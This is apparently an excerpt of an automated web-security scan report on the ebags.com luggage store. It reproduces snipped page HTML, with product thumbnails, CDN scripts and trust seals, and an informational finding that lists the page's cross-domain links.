<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/header/badge_ebags.gif" border=0 alt=" HOME - luggage, handbags, backpacks, bags and travel accessories">
</a>
...[SNIP]...
<a href="#" class="helpLink"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/help/btn-needhelp.gif" alt="Need Help?" /></a>
...[SNIP]...
<a href="#" id="lnkDealOfDay" title="eBags Steal of the Day - one incredible deal, every day"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/header/btn_dealoftheday.gif" alt="Steal of the Day" border="0"></a>
...[SNIP]...
</a>
| <a href="http://ebags.liveclicker.com" class="headerLinkStyle" title="eBags Videos - View hundreds of helpful product videos">Video</a>
...[SNIP]...
<a href="#" onclick=" window.open('/blocks/dsp_non_discountable_brands.cfm','p2','height=750,width=300,scrollbars,resizable');return false" title="An extra 10%* off + Free Shipping Over $50"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/sourceids/CP_IMG_BANNER_86983639.gif" width=960 height="40" border=0>
</a>
...[SNIP]...
</script>
<img name="comparepix" src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/s.gif" width=1 height=1 align="right">
<style>
...[SNIP]...
<a title="eBags Value Set: Packing Cubes + Slim Packing Cubes" href="/product/ebags/value-set-packing-cubes-slim-packing-cubes/115846?productid=1302042"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im6/115846_6_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140" width=140 height=140 border=0 alt="eBags Value Set: Packing Cubes + Slim Packing Cubes" onmouseover="return !ProductHover(115846, event);" onmouseout="ProductHoverClear('productHoverContent');"></a>
...[SNIP]...
<a title="eBags Piazza Day Bag" href="/product/ebags/piazza-day-bag/94553?productid=1237311"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im3/94553_1_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140" width=140 height=140 border=0 alt="eBags Piazza Day Bag" onmouseover="return !ProductHover(94553, event);" onmouseout="ProductHoverClear('productHoverContent');"></a>
...[SNIP]...
<a title="baggallini Sydney Bagg Silver Hardware" href="/product/baggallini/sydney-bagg-silver-hardware/143936?productid=10001524"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im6/143936_5_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140" width=140 height=140 border=0 alt="baggallini Sydney Bagg Silver Hardware" onmouseover="return !ProductHover(143936, event);" onmouseout="ProductHoverClear('productHoverContent');"></a>
...[SNIP]...
<a title="baggallini City Bagg - Crinkle Nylon" href="/product/baggallini/city-bagg-crinkle-nylon/87376?productid=1129577"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im6/87376_6_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140" width=140 height=140 border=0 alt="baggallini City Bagg - Crinkle Nylon" onmouseover="return !ProductHover(87376, event);" onmouseout="ProductHoverClear('productHoverContent');"></a>
...[SNIP]...
<a title="baggallini A La Carte Bagg - Medium - Crinkle Nylon" href="/product/baggallini/a-la-carte-bagg-medium-crinkle-nylon/107617?productid=1283460"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im7/107617_7_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140" width=140 height=140 border=0 alt="baggallini A La Carte Bagg - Medium - Crinkle Nylon" onmouseover="return !ProductHover(107617, event);" onmouseout="ProductHoverClear('productHoverContent');"></a>
...[SNIP]...
<a title="baggallini Complete Cosmetic. Bagg - Rip Stop Nylon" href="/product/baggallini/complete-cosmetic-bagg-rip-stop-nylon/47450?productid=510849"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im0/47450_5_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140" width=140 height=140 border=0 alt="baggallini Complete Cosmetic. Bagg - Rip Stop Nylon" onmouseover="return !ProductHover(47450, event);" onmouseout="ProductHoverClear('productHoverContent');"></a>
...[SNIP]...
<a title="baggallini Everyday Bagg" href="/product/baggallini/everyday-bagg/143934?productid=10001514"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im4/143934_10_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140" width=140 height=140 border=0 alt="baggallini Everyday Bagg" onmouseover="return !ProductHover(143934, event);" onmouseout="ProductHoverClear('productHoverContent');"></a>
...[SNIP]...
<a title="eBags Value Set: Packing Cubes + Pack-It-Flat + Shoe Sleeves" href="/product/ebags/value-set-packing-cubes-pack-it-flat-shoe-sleeves/106795?productid=1281354"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im5/106795_5_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140" width=140 height=140 border=0 alt="eBags Value Set: Packing Cubes + Pack-It-Flat + Shoe Sleeves" onmouseover="return !ProductHover(106795, event);" onmouseout="ProductHoverClear('productHoverContent');"></a>
...[SNIP]...
<a title="baggallini Around Town Bagg - Crinkle Nylon" href="/product/baggallini/around-town-bagg-crinkle-nylon/113065?productid=1298468"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im5/113065_1_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140" width=140 height=140 border=0 alt="baggallini Around Town Bagg - Crinkle Nylon" onmouseover="return !ProductHover(113065, event);" onmouseout="ProductHoverClear('productHoverContent');"></a>
...[SNIP]...
<a title="baggallini Uptown Bagg - Crinkle Nylon" href="/product/baggallini/uptown-bagg-crinkle-nylon/107614?productid=1283436"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im4/107614_1_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140" width=140 height=140 border=0 alt="baggallini Uptown Bagg - Crinkle Nylon" onmouseover="return !ProductHover(107614, event);" onmouseout="ProductHoverClear('productHoverContent');"></a>
...[SNIP]...
<a title="baggallini Expandable Tote - Crinkle Nylon" href="/product/baggallini/expandable-tote-crinkle-nylon/47388?productid=510422"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im8/47388_2_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140" width=140 height=140 border=0 alt="baggallini Expandable Tote - Crinkle Nylon" onmouseover="return !ProductHover(47388, event);" onmouseout="ProductHoverClear('productHoverContent');"></a>
...[SNIP]...
<a title="baggallini Zipper Bagg - Crinkle Nylon" href="/product/baggallini/zipper-bagg-crinkle-nylon/113067?productid=1298484"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im7/113067_1_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140" width=140 height=140 border=0 alt="baggallini Zipper Bagg - Crinkle Nylon" onmouseover="return !ProductHover(113067, event);" onmouseout="ProductHoverClear('productHoverContent');"></a>
...[SNIP]...
<a title="baggallini Town Tote" href="/product/baggallini/town-tote/143945?productid=10001560"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im5/143945_9_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140" width=140 height=140 border=0 alt="baggallini Town Tote" onmouseover="return !ProductHover(143945, event);" onmouseout="ProductHoverClear('productHoverContent');"></a>
...[SNIP]...
<a title="baggallini Wallet.Bagg - Large - Crinkle Nylon" href="/product/baggallini/walletbagg-large-crinkle-nylon/47357?productid=510072"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im7/47357_2_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140" width=140 height=140 border=0 alt="baggallini Wallet.Bagg - Large - Crinkle Nylon" onmouseover="return !ProductHover(47357, event);" onmouseout="ProductHoverClear('productHoverContent');"></a>
...[SNIP]...
<a title="baggallini Hanging Cosmetic Bagg - Rip Stop Nylon" href="/product/baggallini/hanging-cosmetic-bagg-rip-stop-nylon/5733?productid=790156"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im3/5733_1_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140" width=140 height=140 border=0 alt="baggallini Hanging Cosmetic Bagg - Rip Stop Nylon" onmouseover="return !ProductHover(5733, event);" onmouseout="ProductHoverClear('productHoverContent');"></a>
...[SNIP]...
<a title="baggallini Bagg-in-a- Pouch - Medium - Crinkle Nylon" href="/product/baggallini/bagg-in-a-pouch-medium-crinkle-nylon/47366?productid=510125"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im6/47366_2_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140" width=140 height=140 border=0 alt="baggallini Bagg-in-a- Pouch - Medium - Crinkle Nylon" onmouseover="return !ProductHover(47366, event);" onmouseout="ProductHoverClear('productHoverContent');"></a>
...[SNIP]...
<a title="Aurielle-Carryland Pebble Backpack Oval Backpack¡Sling" href="/product/aurielle-carryland/pebble-backpack-oval-backpacksling/16536?productid=60898"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im6/16536_1_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140" width=140 height=140 border=0 alt="Aurielle-Carryland Pebble Backpack Oval Backpack¡Sling" onmouseover="return !ProductHover(16536, event);" onmouseout="ProductHoverClear('productHoverContent');"></a>
...[SNIP]...
<a title="baggallini Sydney Bagg Gold Hardware" href="/product/baggallini/sydney-bagg-gold-hardware/143935?productid=10001515"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im5/143935_2_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140" width=140 height=140 border=0 alt="baggallini Sydney Bagg Gold Hardware" onmouseover="return !ProductHover(143935, event);" onmouseout="ProductHoverClear('productHoverContent');"></a>
...[SNIP]...
<a title="baggallini Baby Hampton Bagg - Crinkle Nylon" href="/product/baggallini/baby-hampton-bagg-crinkle-nylon/107612?productid=1283420"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im2/107612_1_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140" width=140 height=140 border=0 alt="baggallini Baby Hampton Bagg - Crinkle Nylon" onmouseover="return !ProductHover(107612, event);" onmouseout="ProductHoverClear('productHoverContent');"></a>
...[SNIP]...
<a title="Case Logic iPod touch&sup3; Pop Flower Case" href="/product/case-logic/ipod-touch-pop-flower-case/117748?productid=1306237"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im8/117748_1_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140" width=140 height=140 border=0 alt="Case Logic iPod touch&sup3; Pop Flower Case" onmouseover="return !ProductHover(117748, event);" onmouseout="ProductHoverClear('productHoverContent');"></a>
...[SNIP]...
<a title="eBags Value Set: Packing Cubes + Shoe Sleeves" href="/product/ebags/value-set-packing-cubes-shoe-sleeves/106798?productid=1281388"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im8/106798_4_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140" width=140 height=140 border=0 alt="eBags Value Set: Packing Cubes + Shoe Sleeves" onmouseover="return !ProductHover(106798, event);" onmouseout="ProductHoverClear('productHoverContent');"></a>
...[SNIP]...
<a title="Vera Bradley Travel Cosmetic" href="/product/vera-bradley/travel-cosmetic/130505?productid=10116086"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im5/130505_19_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140" width=140 height=140 border=0 alt="Vera Bradley Travel Cosmetic" onmouseover="return !ProductHover(130505, event);" onmouseout="ProductHoverClear('productHoverContent');"></a>
...[SNIP]...
<a title="baggallini Wallet.Bagg - Small - Crinkle Nylon" href="/product/baggallini/walletbagg-small-crinkle-nylon/47349?productid=510056"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im9/47349_2_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140" width=140 height=140 border=0 alt="baggallini Wallet.Bagg - Small - Crinkle Nylon" onmouseover="return !ProductHover(47349, event);" onmouseout="ProductHoverClear('productHoverContent');"></a>
...[SNIP]...
<a title="baggallini Jewelry Pouch.Bagg - Rip Stop Nylon" href="/product/baggallini/jewelry-pouchbagg-rip-stop-nylon/18643?productid=66035"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im3/18643_2_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140" width=140 height=140 border=0 alt="baggallini Jewelry Pouch.Bagg - Rip Stop Nylon" onmouseover="return !ProductHover(18643, event);" onmouseout="ProductHoverClear('productHoverContent');"></a>
...[SNIP]...
<a title="baggallini Bagg-in-a- Pouch - Large - Crinkle Nylon" href="/product/baggallini/bagg-in-a-pouch-large-crinkle-nylon/47367?productid=789009"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im7/47367_12_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140" width=140 height=140 border=0 alt="baggallini Bagg-in-a- Pouch - Large - Crinkle Nylon" onmouseover="return !ProductHover(47367, event);" onmouseout="ProductHoverClear('productHoverContent');"></a>
...[SNIP]...
<a title="baggallini New Yorker - Crinkle Nylon Silver Hardware" href="/product/baggallini/new-yorker-crinkle-nylon-silver-hardware/136619?productid=1354293"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im9/136619_1_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140" width=140 height=140 border=0 alt="baggallini New Yorker - Crinkle Nylon Silver Hardware" onmouseover="return !ProductHover(136619, event);" onmouseout="ProductHoverClear('productHoverContent');"></a>
...[SNIP]...
<a title="eBags Value Set: Packing Cubes + Portage Jr." href="/product/ebags/value-set-packing-cubes-portage-jr/106800?productid=1281403"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im0/106800_6_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140" width=140 height=140 border=0 alt="eBags Value Set: Packing Cubes + Portage Jr." onmouseover="return !ProductHover(106800, event);" onmouseout="ProductHoverClear('productHoverContent');"></a>
...[SNIP]...
<a title="baggallini Triple Zip Bagg" href="/product/baggallini/triple-zip-bagg/127324?productid=1330212"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im4/127324_1_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140" width=140 height=140 border=0 alt="baggallini Triple Zip Bagg" onmouseover="return !ProductHover(127324, event);" onmouseout="ProductHoverClear('productHoverContent');"></a>
...[SNIP]...
<a title="baggallini Zip-Out Shopping Tote.Bagg - Medium - Rip Stop Nylon" href="/product/baggallini/zip-out-shopping-totebagg-medium-rip-stop-nylon/18647?productid=66074"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im7/18647_3_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140" width=140 height=140 border=0 alt="baggallini Zip-Out Shopping Tote.Bagg - Medium - Rip Stop Nylon" onmouseover="return !ProductHover(18647, event);" onmouseout="ProductHoverClear('productHoverContent');"></a>
...[SNIP]...
<a title="baggallini Brussels Bagg - Crinkle Nylon Silver Hardware" href="/product/baggallini/brussels-bagg-crinkle-nylon-silver-hardware/136614?productid=1354238"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im4/136614_1_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140" width=140 height=140 border=0 alt="baggallini Brussels Bagg - Crinkle Nylon Silver Hardware" onmouseover="return !ProductHover(136614, event);" onmouseout="ProductHoverClear('productHoverContent');"></a>
...[SNIP]...
<a title="Eagle Creek Pack-It® Compression Set - S¡M¡L" href="/product/eagle-creek/pack-it-compression-set-sml/89786?productid=1176684"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im6/89786_1_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140" width=140 height=140 border=0 alt="Eagle Creek Pack-It® Compression Set - S¡M¡L" onmouseover="return !ProductHover(89786, event);" onmouseout="ProductHoverClear('productHoverContent');"></a>
...[SNIP]...
<a title="baggallini Milano Tote - Silver Hardware" href="/product/baggallini/milano-tote-silver-hardware/127321?productid=1344187"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im1/127321_8_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140" width=140 height=140 border=0 alt="baggallini Milano Tote - Silver Hardware" onmouseover="return !ProductHover(127321, event);" onmouseout="ProductHoverClear('productHoverContent');"></a>
...[SNIP]...
<a title="baggallini Jewelry Square.Bagg - Rip Stop Nylon" href="/product/baggallini/jewelry-squarebagg-rip-stop-nylon/47422?productid=510727"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im2/47422_2_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140" width=140 height=140 border=0 alt="baggallini Jewelry Square.Bagg - Rip Stop Nylon" onmouseover="return !ProductHover(47422, event);" onmouseout="ProductHoverClear('productHoverContent');"></a>
...[SNIP]...
<a title="baggallini Messenger Sling.Bagg - Rip Stop Nylon" href="/product/baggallini/messenger-slingbagg-rip-stop-nylon/18644?productid=66039"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im4/18644_11_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140" width=140 height=140 border=0 alt="baggallini Messenger Sling.Bagg - Rip Stop Nylon" onmouseover="return !ProductHover(18644, event);" onmouseout="ProductHoverClear('productHoverContent');"></a>
...[SNIP]...
<a title="baggallini Messenger Sling.Bagg - Crinkle Nylon" href="/product/baggallini/messenger-slingbagg-crinkle-nylon/47360?productid=1330179"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im0/47360_15_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140" width=140 height=140 border=0 alt="baggallini Messenger Sling.Bagg - Crinkle Nylon" onmouseover="return !ProductHover(47360, event);" onmouseout="ProductHoverClear('productHoverContent');"></a>
...[SNIP]...
<a title="baggallini Expandable Tote - Animal Prints" href="/product/baggallini/expandable-tote-animal-prints/107704?productid=1283629"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im4/107704_2_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140" width=140 height=140 border=0 alt="baggallini Expandable Tote - Animal Prints" onmouseover="return !ProductHover(107704, event);" onmouseout="ProductHoverClear('productHoverContent');"></a>
...[SNIP]...
<a title="baggallini Hanging Cosmetic Bagg - Crinkle Nylon" href="/product/baggallini/hanging-cosmetic-bagg-crinkle-nylon/67303?productid=791405"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im3/67303_7_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140" width=140 height=140 border=0 alt="baggallini Hanging Cosmetic Bagg - Crinkle Nylon" onmouseover="return !ProductHover(67303, event);" onmouseout="ProductHoverClear('productHoverContent');"></a>
...[SNIP]...
<a title="baggallini Ticket Organizer Bagg - Crinkle Nylon" href="/product/baggallini/ticket-organizer-bagg-crinkle-nylon/47402?productid=510572"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im2/47402_6_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140" width=140 height=140 border=0 alt="baggallini Ticket Organizer Bagg - Crinkle Nylon" onmouseover="return !ProductHover(47402, event);" onmouseout="ProductHoverClear('productHoverContent');"></a>
...[SNIP]...
<a title="baggallini Travel Kitt - Crinkle Nylon" href="/product/baggallini/travel-kitt-crinkle-nylon/107615?productid=1283448"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im5/107615_5_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140" width=140 height=140 border=0 alt="baggallini Travel Kitt - Crinkle Nylon" onmouseover="return !ProductHover(107615, event);" onmouseout="ProductHoverClear('productHoverContent');"></a>
...[SNIP]...
<a title="baggallini Jewelry Square Bagg - Crinkle Nylon" href="/product/baggallini/jewelry-square-bagg-crinkle-nylon/47438?productid=1344180"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im8/47438_12_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140" width=140 height=140 border=0 alt="baggallini Jewelry Square Bagg - Crinkle Nylon" onmouseover="return !ProductHover(47438, event);" onmouseout="ProductHoverClear('productHoverContent');"></a>
...[SNIP]...
<a title="baggallini Phone¡PDA Case - Crinkle Nylon" href="/product/baggallini/phonepda-case-crinkle-nylon/87345?productid=1129536"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im5/87345_8_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140" width=140 height=140 border=0 alt="baggallini Phone¡PDA Case - Crinkle Nylon" onmouseover="return !ProductHover(87345, event);" onmouseout="ProductHoverClear('productHoverContent');"></a>
...[SNIP]...
<a title="eBags Value Set: Pack-It-Flat + Shoe Bag" href="/product/ebags/value-set-pack-it-flat-shoe-bag/106803?productid=1281424"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im3/106803_5_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140" width=140 height=140 border=0 alt="eBags Value Set: Pack-It-Flat + Shoe Bag" onmouseover="return !ProductHover(106803, event);" onmouseout="ProductHoverClear('productHoverContent');"></a>
...[SNIP]...
<a title="baggallini Midtown Bagg" href="/product/baggallini/midtown-bagg/125167?productid=1324308"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im7/125167_1_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140" width=140 height=140 border=0 alt="baggallini Midtown Bagg" onmouseover="return !ProductHover(125167, event);" onmouseout="ProductHoverClear('productHoverContent');"></a>
...[SNIP]...
<a title="baggallini Downtown Bagg - Animal Prints" href="/product/baggallini/downtown-bagg-animal-prints/107697?productid=1283609"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im7/107697_2_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140" width=140 height=140 border=0 alt="baggallini Downtown Bagg - Animal Prints" onmouseover="return !ProductHover(107697, event);" onmouseout="ProductHoverClear('productHoverContent');"></a>
...[SNIP]...
<a title="baggallini Ticket Organizer Bagg - Rip Stop" href="/product/baggallini/ticket-organizer-bagg-rip-stop/47391?productid=510440"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im1/47391_8_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140" width=140 height=140 border=0 alt="baggallini Ticket Organizer Bagg - Rip Stop" onmouseover="return !ProductHover(47391, event);" onmouseout="ProductHoverClear('productHoverContent');"></a>
...[SNIP]...
<a title="baggallini Curling Iron Cover.Bagg - Rip Stop Nylon" href="/product/baggallini/curling-iron-coverbagg-rip-stop-nylon/47409?productid=510613"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im9/47409_4_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140" width=140 height=140 border=0 alt="baggallini Curling Iron Cover.Bagg - Rip Stop Nylon" onmouseover="return !ProductHover(47409, event);" onmouseout="ProductHoverClear('productHoverContent');"></a>
...[SNIP]...
<a title="A. Saks Deluxe Toiletry Kit" href="/product/a-saks/deluxe-toiletry-kit/122015?productid=1316097"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im5/122015_1_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140" width=140 height=140 border=0 alt="A. Saks Deluxe Toiletry Kit" onmouseover="return !ProductHover(122015, event);" onmouseout="ProductHoverClear('productHoverContent');"></a>
...[SNIP]...
<a title="Case Logic iPod touch&sup3; (1st & 2nd Gen) Satin Stripe Case" href="/product/case-logic/ipod-touch-1st-and-2nd-gen-satin-stripe-case/119373?productid=1309952"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im3/119373_1_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140" width=140 height=140 border=0 alt="Case Logic iPod touch&sup3; (1st & 2nd Gen) Satin Stripe Case" onmouseover="return !ProductHover(119373, event);" onmouseout="ProductHoverClear('productHoverContent');"></a>
...[SNIP]...
<a title="baggallini Baby Hampton Bagg - Animal Prints" href="/product/baggallini/baby-hampton-bagg-animal-prints/107678?productid=1283553"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im8/107678_1_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140" width=140 height=140 border=0 alt="baggallini Baby Hampton Bagg - Animal Prints" onmouseover="return !ProductHover(107678, event);" onmouseout="ProductHoverClear('productHoverContent');"></a>
...[SNIP]...
<a title="baggallini City Bagg - Animal Prints" href="/product/baggallini/city-bagg-animal-prints/107687?productid=1283572"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im7/107687_2_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140" width=140 height=140 border=0 alt="baggallini City Bagg - Animal Prints" onmouseover="return !ProductHover(107687, event);" onmouseout="ProductHoverClear('productHoverContent');"></a>
...[SNIP]...
<li><a href="http://www.facebook.com/eBags" id="fb">Join Us on Facebook</a>
...[SNIP]...
<li><a href="http://twitter.com/eBagsOnline" id="twit">Follow Us on Twitter</a>
...[SNIP]...
<li><a href="http://www.ebagscorporate.com/">Corporate Sales</a>
...[SNIP]...
<div style="padding-top:10px;"><a href="http://www.stellaservice.com/index.php?option=com_score&site=www.ebags.com" target="_blank"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/logo-stella.gif" width="61" height="39" border="0" alt="Stella Service Elite" /></a>
...[SNIP]...
<a href="javascript:openSesame('https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=www.ebags.com&lang=en','Security','no','500','450','no','yes','no','111','111')"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/verisignseal.gif" width="100" height="72" border="0"></a></div>
<div><a target="_blank" href="https://www.mcafeesecure.com/RatingVerify?ref=www.ebags.com"><img width="65" height="37" border="0" src="//images.scanalert.com/meter/survey/www.ebags.com/63.gif" alt="McAfee Secure sites help keep you safe from identity theft, credit card fraud, spyware, spam, viruses and online scams" oncontextmenu="alert('Copying Prohibited by Law - McAfee Secure is a Trademark of McAfee, Inc.'); return false;"></a>
...[SNIP]...
</div>

<script src="http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2"></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.liveclicker.min.js?ver=1'></script>
...[SNIP]...

4.5. http://www.ebags.com/help/index.cfm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/help/index.cfm

Issue detail

The page was loaded from a URL containing a query string:

http://www.ebags.com/help/index.cfm?fuseaction=suggest&HelpCenter_Link=Suggestions

The response contains the following links to other domains:

http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/favicon.ico
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/header/badge_ebags.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/header/btn_dealoftheday.gif
